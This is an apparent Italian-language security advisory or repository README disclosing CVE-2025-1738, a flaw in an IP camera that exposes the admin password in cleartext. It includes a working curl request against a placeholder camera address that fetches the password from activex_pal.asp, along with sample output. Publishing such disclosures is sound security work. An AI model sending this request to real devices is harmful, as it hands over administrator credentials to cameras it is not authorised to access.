
Scoperta 0day CVE-2025-1738
In seguito a una divulgazione responsabile, sono state assegnate due CVE ufficiali.
| CVE | CVSS v3.1 | Punteggio | CWE | Tipo |
|---|---|---|---|---|
| CVE-2025-1738 | AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N | 6.2 | CWE-598 | Esposizione di password in chiaro |
Qualsiasi utente locale può recuperare la password di amministrazione in chiaro senza necessitare di autenticazione preventiva.
curl -u admin:whatever http://<CAMERA_IP>:<PORT> --request-target en/player/activex_pal.asp
...password=unguessable123!...
La password di amministrazione viene restituita in chiaro nel corpo della risposta.
activex_pal.asp e mblogin.asp.Questo repository è destinato esclusivamente a ricerca sulla sicurezza a scopo educativo e autorizzata. Gli autori non sono responsabili di alcun uso improprio. Ottenere sempre un'autorizzazione esplicita prima di testare qualsiasi dispositivo.